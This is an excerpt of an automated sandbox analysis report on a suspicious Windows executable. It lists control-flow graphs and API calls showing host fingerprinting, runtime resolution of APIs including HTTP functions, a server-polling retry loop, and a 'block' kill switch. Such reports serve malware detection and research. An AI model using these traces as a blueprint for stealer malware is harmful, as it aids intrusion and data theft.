                    • Instruction Fuzzy Hash: 76714071A00218EBDB24DFA4DC49BEE7778FB44701F508159F5096B1D0DBB46A89CF91

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1275 9678e0-967937 GetProcessHeap RtlAllocateHeap GetComputerNameA 1276 967942-967945 1275->1276 1277 967939-96793e 1275->1277 1278 967962-967972 1276->1278 1277->1278
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00967910
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00967917
                    • GetComputerNameA.KERNEL32(?,00000104), ref: 0096792F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateComputerNameProcess
                    • String ID:
                    • API String ID: 1664310425-0
                    • Opcode ID: a332decb25fef238df94d115717abda4f46150f0e760aeb35509c36b14c14063
                    • Instruction ID: d8b84ea89ea1c76df705313727dc72e6bef526249d0f252e200a5f3acedca1f7
                    • Opcode Fuzzy Hash: a332decb25fef238df94d115717abda4f46150f0e760aeb35509c36b14c14063
                    • Instruction Fuzzy Hash: 130181B1A04208EBD710DF99DE49BAAFBFCFB44B25F10425AFA45E3280D77459008BA1
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009511B7), ref: 00967880
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00967887
                    • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0096789F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateNameProcessUser
                    • String ID:
                    • API String ID: 1296208442-0
                    • Opcode ID: 5d2aa75040908ff023b4733234e200946f9d77a34370047f12aa08576f7aca4b
                    • Instruction ID: ac3cffc8cedc081df24426c8166192e75ad7a402d2e5494205da62629060ea27
                    • Opcode Fuzzy Hash: 5d2aa75040908ff023b4733234e200946f9d77a34370047f12aa08576f7aca4b
                    • Instruction Fuzzy Hash: 06F044B1D44208ABC700DFD5DD49BAEFBB8E704711F10055AF615A3680C77819048BE1
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExitInfoProcessSystem
                    • String ID:
                    • API String ID: 752954902-0
                    • Opcode ID: f13618dd7d9bf88693169da9cfc09371639c9d13df7a7dd2b212770b2bbcb9be
                    • Instruction ID: 9c2ce5e1b61618e4652fdbec8018596134572e3728fee230b8be63027a573333
                    • Opcode Fuzzy Hash: f13618dd7d9bf88693169da9cfc09371639c9d13df7a7dd2b212770b2bbcb9be
                    • Instruction Fuzzy Hash: 55D05E7490430CDBCB00DFE0D94A6DDBB78FB08312F100596DD0563340EE306885CBA6

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 633 969c10-969c1a 634 96a036-96a0ca LoadLibraryA * 8 633->634 635 969c20-96a031 GetProcAddress * 43 633->635 636 96a146-96a14d 634->636 637 96a0cc-96a141 GetProcAddress * 5 634->637 635->634 638 96a216-96a21d 636->638 639 96a153-96a211 GetProcAddress * 8 636->639 637->636 640 96a21f-96a293 GetProcAddress * 5 638->640 641 96a298-96a29f 638->641 639->638 640->641 642 96a337-96a33e 641->642 643 96a2a5-96a332 GetProcAddress * 6 641->643 644 96a344-96a41a GetProcAddress * 9 642->644 645 96a41f-96a426 642->645 643->642 644->645 646 96a4a2-96a4a9 645->646 647 96a428-96a49d GetProcAddress * 5 645->647 648 96a4dc-96a4e3 646->648 649 96a4ab-96a4d7 GetProcAddress * 2 646->649 647->646 650 96a515-96a51c 648->650 651 96a4e5-96a510 GetProcAddress * 2 648->651 649->648 652 96a612-96a619 650->652 653 96a522-96a60d GetProcAddress * 10 650->653 651->650 654 96a67d-96a684 652->654 655 96a61b-96a678 GetProcAddress * 4 652->655 653->652 656 96a686-96a699 GetProcAddress 654->656 657 96a69e-96a6a5 654->657 655->654 656->657 658 96a6a7-96a703 GetProcAddress * 4 657->658 659 96a708-96a709 657->659 658->659
                    APIs
                    • GetProcAddress.KERNEL32(74DD0000,005A5E10), ref: 00969C2D
                    • GetProcAddress.KERNEL32(74DD0000,005A5B70), ref: 00969C45
                    • GetProcAddress.KERNEL32(74DD0000,005B9628), ref: 00969C5E
                    • GetProcAddress.KERNEL32(74DD0000,005B9658), ref: 00969C76
                    • GetProcAddress.KERNEL32(74DD0000,005B96D0), ref: 00969C8E
                    • GetProcAddress.KERNEL32(74DD0000,005B9670), ref: 00969CA7
                    • GetProcAddress.KERNEL32(74DD0000,005AB630), ref: 00969CBF
                    • GetProcAddress.KERNEL32(74DD0000,005BD128), ref: 00969CD7
                    • GetProcAddress.KERNEL32(74DD0000,005BD398), ref: 00969CF0
                    • GetProcAddress.KERNEL32(74DD0000,005BD308), ref: 00969D08
                    • GetProcAddress.KERNEL32(74DD0000,005BD230), ref: 00969D20
                    • GetProcAddress.KERNEL32(74DD0000,005A5C10), ref: 00969D39
                    • GetProcAddress.KERNEL32(74DD0000,005A5C30), ref: 00969D51
                    • GetProcAddress.KERNEL32(74DD0000,005A5C50), ref: 00969D69
                    • GetProcAddress.KERNEL32(74DD0000,005A5C70), ref: 00969D82
                    • GetProcAddress.KERNEL32(74DD0000,005BD170), ref: 00969D9A
                    • GetProcAddress.KERNEL32(74DD0000,005BD1D0), ref: 00969DB2
                    • GetProcAddress.KERNEL32(74DD0000,005AB978), ref: 00969DCB
                    • GetProcAddress.KERNEL32(74DD0000,005A5CF0), ref: 00969DE3
                    • GetProcAddress.KERNEL32(74DD0000,005BD350), ref: 00969DFB
                    • GetProcAddress.KERNEL32(74DD0000,005BD140), ref: 00969E14
                    • GetProcAddress.KERNEL32(74DD0000,005BD380), ref: 00969E2C
                    • GetProcAddress.KERNEL32(74DD0000,005BD368), ref: 00969E44
                    • GetProcAddress.KERNEL32(74DD0000,005A5E30), ref: 00969E5D
                    • GetProcAddress.KERNEL32(74DD0000,005BD2D8), ref: 00969E75
                    • GetProcAddress.KERNEL32(74DD0000,005BD2A8), ref: 00969E8D
                    • GetProcAddress.KERNEL32(74DD0000,005BD290), ref: 00969EA6
                    • GetProcAddress.KERNEL32(74DD0000,005BD188), ref: 00969EBE
                    • GetProcAddress.KERNEL32(74DD0000,005BD320), ref: 00969ED6
                    • GetProcAddress.KERNEL32(74DD0000,005BD1E8), ref: 00969EEF
                    • GetProcAddress.KERNEL32(74DD0000,005BD200), ref: 00969F07
                    • GetProcAddress.KERNEL32(74DD0000,005BD338), ref: 00969F1F
                    • GetProcAddress.KERNEL32(74DD0000,005BD2C0), ref: 00969F38
                    • GetProcAddress.KERNEL32(74DD0000,005BA840), ref: 00969F50
                    • GetProcAddress.KERNEL32(74DD0000,005BD3B0), ref: 00969F68
                    • GetProcAddress.KERNEL32(74DD0000,005BD158), ref: 00969F81
                    • GetProcAddress.KERNEL32(74DD0000,005A5D30), ref: 00969F99
                    • GetProcAddress.KERNEL32(74DD0000,005BD218), ref: 00969FB1
                    • GetProcAddress.KERNEL32(74DD0000,005A56D0), ref: 00969FCA
                    • GetProcAddress.KERNEL32(74DD0000,005BD1A0), ref: 00969FE2
                    • GetProcAddress.KERNEL32(74DD0000,005BD1B8), ref: 00969FFA
                    • GetProcAddress.KERNEL32(74DD0000,005A59B0), ref: 0096A013
                    • GetProcAddress.KERNEL32(74DD0000,005A5850), ref: 0096A02B
                    • LoadLibraryA.KERNEL32(005BD248,?,00965CA3,00970AEB,?,?,?,?,?,?,?,?,?,?,00970AEA,00970AE3), ref: 0096A03D
                    • LoadLibraryA.KERNEL32(005BD3C8,?,00965CA3,00970AEB,?,?,?,?,?,?,?,?,?,?,00970AEA,00970AE3), ref: 0096A04E
                    • LoadLibraryA.KERNEL32(005BD260,?,00965CA3,00970AEB,?,?,?,?,?,?,?,?,?,?,00970AEA,00970AE3), ref: 0096A060
                    • LoadLibraryA.KERNEL32(005BD278,?,00965CA3,00970AEB,?,?,?,?,?,?,?,?,?,?,00970AEA,00970AE3), ref: 0096A072
                    • LoadLibraryA.KERNEL32(005BD2F0,?,00965CA3,00970AEB,?,?,?,?,?,?,?,?,?,?,00970AEA,00970AE3), ref: 0096A083
                    • LoadLibraryA.KERNEL32(005BD3E0,?,00965CA3,00970AEB,?,?,?,?,?,?,?,?,?,?,00970AEA,00970AE3), ref: 0096A095
                    • LoadLibraryA.KERNEL32(005BD0F8,?,00965CA3,00970AEB,?,?,?,?,?,?,?,?,?,?,00970AEA,00970AE3), ref: 0096A0A7
                    • LoadLibraryA.KERNEL32(005BD110,?,00965CA3,00970AEB,?,?,?,?,?,?,?,?,?,?,00970AEA,00970AE3), ref: 0096A0B8
                    • GetProcAddress.KERNEL32(75290000,005A56F0), ref: 0096A0DA
                    • GetProcAddress.KERNEL32(75290000,005BD518), ref: 0096A0F2
                    • GetProcAddress.KERNEL32(75290000,005B9088), ref: 0096A10A
                    • GetProcAddress.KERNEL32(75290000,005BD4B8), ref: 0096A123
                    • GetProcAddress.KERNEL32(75290000,005A59D0), ref: 0096A13B
                    • GetProcAddress.KERNEL32(6FCD0000,005AB860), ref: 0096A160
                    • GetProcAddress.KERNEL32(6FCD0000,005A5710), ref: 0096A179
                    • GetProcAddress.KERNEL32(6FCD0000,005AB888), ref: 0096A191
                    • GetProcAddress.KERNEL32(6FCD0000,005BD428), ref: 0096A1A9
                    • GetProcAddress.KERNEL32(6FCD0000,005BD590), ref: 0096A1C2
                    • GetProcAddress.KERNEL32(6FCD0000,005A5870), ref: 0096A1DA
                    • GetProcAddress.KERNEL32(6FCD0000,005A5A10), ref: 0096A1F2
                    • GetProcAddress.KERNEL32(6FCD0000,005BD488), ref: 0096A20B
                    • GetProcAddress.KERNEL32(752C0000,005A5890), ref: 0096A22C
                    • GetProcAddress.KERNEL32(752C0000,005A5970), ref: 0096A244
                    • GetProcAddress.KERNEL32(752C0000,005BD4A0), ref: 0096A25D
                    • GetProcAddress.KERNEL32(752C0000,005BD5A8), ref: 0096A275
                    • GetProcAddress.KERNEL32(752C0000,005A57F0), ref: 0096A28D
                    • GetProcAddress.KERNEL32(74EC0000,005AB6F8), ref: 0096A2B3
                    • GetProcAddress.KERNEL32(74EC0000,005AB720), ref: 0096A2CB
                    • GetProcAddress.KERNEL32(74EC0000,005BD470), ref: 0096A2E3
                    • GetProcAddress.KERNEL32(74EC0000,005A58F0), ref: 0096A2FC
                    • GetProcAddress.KERNEL32(74EC0000,005A5A50), ref: 0096A314
                    • GetProcAddress.KERNEL32(74EC0000,005AB900), ref: 0096A32C
                    • GetProcAddress.KERNEL32(75BD0000,005BD440), ref: 0096A352
                    • GetProcAddress.KERNEL32(75BD0000,005A59F0), ref: 0096A36A
                    • GetProcAddress.KERNEL32(75BD0000,005B9028), ref: 0096A382
                    • GetProcAddress.KERNEL32(75BD0000,005BD3F8), ref: 0096A39B
                    • GetProcAddress.KERNEL32(75BD0000,005BD4D0), ref: 0096A3B3
                    • GetProcAddress.KERNEL32(75BD0000,005A5810), ref: 0096A3CB
                    • GetProcAddress.KERNEL32(75BD0000,005A5990), ref: 0096A3E4
                    • GetProcAddress.KERNEL32(75BD0000,005BD4E8), ref: 0096A3FC
                    • GetProcAddress.KERNEL32(75BD0000,005BD458), ref: 0096A414
                    • GetProcAddress.KERNEL32(75A70000,005A58B0), ref: 0096A436
                    • GetProcAddress.KERNEL32(75A70000,005BD500), ref: 0096A44E
                    • GetProcAddress.KERNEL32(75A70000,005BD410), ref: 0096A466
                    • GetProcAddress.KERNEL32(75A70000,005BD530), ref: 0096A47F
                    • GetProcAddress.KERNEL32(75A70000,005BD548), ref: 0096A497
                    • GetProcAddress.KERNEL32(75450000,005A5770), ref: 0096A4B8
                    • GetProcAddress.KERNEL32(75450000,005A5790), ref: 0096A4D1
                    • GetProcAddress.KERNEL32(75DA0000,005A56B0), ref: 0096A4F2
                    • GetProcAddress.KERNEL32(75DA0000,005BD560), ref: 0096A50A
                    • GetProcAddress.KERNEL32(6F070000,005A5930), ref: 0096A530
                    • GetProcAddress.KERNEL32(6F070000,005A58D0), ref: 0096A548
                    • GetProcAddress.KERNEL32(6F070000,005A5950), ref: 0096A560
                    • GetProcAddress.KERNEL32(6F070000,005BD578), ref: 0096A579
                    • GetProcAddress.KERNEL32(6F070000,005A57B0), ref: 0096A591
                    • GetProcAddress.KERNEL32(6F070000,005A5A30), ref: 0096A5A9
                    • GetProcAddress.KERNEL32(6F070000,005A57D0), ref: 0096A5C2
                    • GetProcAddress.KERNEL32(6F070000,005A5730), ref: 0096A5DA
                    • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 0096A5F1
                    • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 0096A607
                    • GetProcAddress.KERNEL32(75AF0000,005BCFA8), ref: 0096A629
                    • GetProcAddress.KERNEL32(75AF0000,005B8FB8), ref: 0096A641
                    • GetProcAddress.KERNEL32(75AF0000,005BCFD8), ref: 0096A659
                    • GetProcAddress.KERNEL32(75AF0000,005BD098), ref: 0096A672
                    • GetProcAddress.KERNEL32(75D90000,005A5A70), ref: 0096A693
                    • GetProcAddress.KERNEL32(6F9D0000,005BCE88), ref: 0096A6B4
                    • GetProcAddress.KERNEL32(6F9D0000,005A5830), ref: 0096A6CD
                    • GetProcAddress.KERNEL32(6F9D0000,005BCF30), ref: 0096A6E5
                    • GetProcAddress.KERNEL32(6F9D0000,005BD0B0), ref: 0096A6FD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$LibraryLoad
                    • String ID: 0WZ$0XZ$0YZ$0ZZ$0\Z$0]Z$0^Z$HttpQueryInfoA$InternetSetOptionA$PXZ$PYZ$PZZ$P\Z$pWZ$pXZ$pYZ$pZZ$p[Z$p\Z
                    • API String ID: 2238633743-135805970
                    • Opcode ID: 84ae688f9238fdfaec65dccbcdf970c131d02c80e8d34167dd62c7ad73a52a8b
                    • Instruction ID: 51524164b36dad10dd1c7f5a48c053c24323c9648bb91590248543aecb6cdb7f
                    • Opcode Fuzzy Hash: 84ae688f9238fdfaec65dccbcdf970c131d02c80e8d34167dd62c7ad73a52a8b
                    • Instruction Fuzzy Hash: AC62FAB5614200AFC344DFA9EF999663BF9F78C601724851BA609C3274DE39A841DBE3

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 858 965510-965577 call 965ad0 call 96a820 * 3 call 96a740 * 4 874 96557c-965583 858->874 875 9655d7-96564c call 96a740 * 2 call 951590 call 9652c0 call 96a8a0 call 96a800 call 96aad0 StrCmpCA 874->875 876 965585-9655b6 call 96a820 call 96a7a0 call 951590 call 9651f0 874->876 902 965693-9656a9 call 96aad0 StrCmpCA 875->902 906 96564e-96568e call 96a7a0 call 951590 call 9651f0 call 96a8a0 call 96a800 875->906 892 9655bb-9655d2 call 96a8a0 call 96a800 876->892 892->902 907 9656af-9656b6 902->907 908 9657dc-965844 call 96a8a0 call 96a820 * 2 call 951670 call 96a800 * 4 call 966560 call 951550 902->908 906->902 910 9656bc-9656c3 907->910 911 9657da-96585f call 96aad0 StrCmpCA 907->911 1037 965ac3-965ac6 908->1037 915 9656c5-965719 call 96a820 call 96a7a0 call 951590 call 9651f0 call 96a8a0 call 96a800 910->915 916 96571e-965793 call 96a740 * 2 call 951590 call 9652c0 call 96a8a0 call 96a800 call 96aad0 StrCmpCA 910->916 930 965865-96586c 911->930 931 965991-9659f9 call 96a8a0 call 96a820 * 2 call 951670 call 96a800 * 4 call 966560 call 951550 911->931 915->911 916->911 1014 965795-9657d5 call 96a7a0 call 951590 call 9651f0 call 96a8a0 call 96a800 916->1014 937 965872-965879 930->937 938 96598f-965a14 call 96aad0 StrCmpCA 930->938 931->1037 945 9658d3-965948 call 96a740 * 2 call 951590 call 9652c0 call 96a8a0 call 96a800 call 96aad0 StrCmpCA 937->945 946 96587b-9658ce call 96a820 call 96a7a0 call 951590 call 9651f0 call 96a8a0 call 96a800 937->946 966 965a16-965a21 Sleep 938->966 967 965a28-965a91 call 96a8a0 call 96a820 * 2 call 951670 call 96a800 * 4 call 966560 call 951550 938->967 945->938 1043 96594a-96598a call 96a7a0 call 951590 call 9651f0 call 96a8a0 call 96a800 945->1043 946->938 966->874 967->1037 1014->911 1043->938
                    APIs
                      • Part of subcall function 0096A820: lstrlen.KERNEL32(00954F05,?,?,00954F05,00970DDE), ref: 0096A82B
                      • Part of subcall function 0096A820: lstrcpy.KERNEL32(00970DDE,00000000), ref: 0096A885
                      • Part of subcall function 0096A740: lstrcpy.KERNEL32(00970E17,00000000), ref: 0096A788
                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00965644
                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 009656A1
                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00965857
                      • Part of subcall function 0096A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0096A7E6
                      • Part of subcall function 009651F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00965228
                      • Part of subcall function 0096A8A0: lstrcpy.KERNEL32(?,00970E17), ref: 0096A905
                      • Part of subcall function 009652C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00965318
                      • Part of subcall function 009652C0: lstrlen.KERNEL32(00000000), ref: 0096532F
                      • Part of subcall function 009652C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00965364
                      • Part of subcall function 009652C0: lstrlen.KERNEL32(00000000), ref: 00965383
                      • Part of subcall function 009652C0: lstrlen.KERNEL32(00000000), ref: 009653AE
                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0096578B
                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00965940
                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00965A0C
                    • Sleep.KERNEL32(0000EA60), ref: 00965A1B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpylstrlen$Sleep
                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                    • API String ID: 507064821-2791005934
                    • Opcode ID: 900c406d11f2a535056ad9c779c321dbd575fdaa4d4904158c38431b6d588f25
                    • Instruction ID: 888875068a71655f85af736a59fb2ce0e310b91d214a854f3675bb5b9dcb84a2
                    • Opcode Fuzzy Hash: 900c406d11f2a535056ad9c779c321dbd575fdaa4d4904158c38431b6d588f25
                    • Instruction Fuzzy Hash: E4E1FD72910104AACB18FBB0DD96BED737DAFD4340F508529B50667195EF34AA09CFA2

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1069 9617a0-9617cd call 96aad0 StrCmpCA 1072 9617d7-9617f1 call 96aad0 1069->1072 1073 9617cf-9617d1 ExitProcess 1069->1073 1077 9617f4-9617f8 1072->1077 1078 9619c2-9619cd call 96a800 1077->1078 1079 9617fe-961811 1077->1079 1081 961817-96181a 1079->1081 1082 96199e-9619bd 1079->1082 1084 961835-961844 call 96a820 1081->1084 1085 961932-961943 StrCmpCA 1081->1085 1086 961913-961924 StrCmpCA 1081->1086 1087 961970-961981 StrCmpCA 1081->1087 1088 9618f1-961902 StrCmpCA 1081->1088 1089 961951-961962 StrCmpCA 1081->1089 1090 96187f-961890 StrCmpCA 1081->1090 1091 96185d-96186e StrCmpCA 1081->1091 1092 961821-961830 call 96a820 1081->1092 1093 9618cf-9618e0 StrCmpCA 1081->1093 1094 96198f-961999 call 96a820 1081->1094 1095 9618ad-9618be StrCmpCA 1081->1095 1096 961849-961858 call 96a820 1081->1096 1082->1077 1084->1082 1110 961945-961948 1085->1110 1111 96194f 1085->1111 1108 961926-961929 1086->1108 1109 961930 1086->1109 1115 961983-961986 1087->1115 1116 96198d 1087->1116 1106 961904-961907 1088->1106 1107 96190e 1088->1107 1112 961964-961967 1089->1112 1113 96196e 1089->1113 1100 961892-96189c 1090->1100 1101 96189e-9618a1 1090->1101 1098 961870-961873 1091->1098 1099 96187a 1091->1099 1092->1082 1104 9618e2-9618e5 1093->1104 1105 9618ec 1093->1105 1094->1082 1102 9618c0-9618c3 1095->1102 1103 9618ca 1095->1103 1096->1082 1098->1099 1099->1082 1120 9618a8 1100->1120 1101->1120 1102->1103 1103->1082 1104->1105 1105->1082 1106->1107 1107->1082 1108->1109 1109->1082 1110->1111 1111->1082 1112->1113 1113->1082 1115->1116 1116->1082 1120->1082
                    APIs
                    • StrCmpCA.SHLWAPI(00000000,block), ref: 009617C5
                    • ExitProcess.KERNEL32 ref: 009617D1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmp
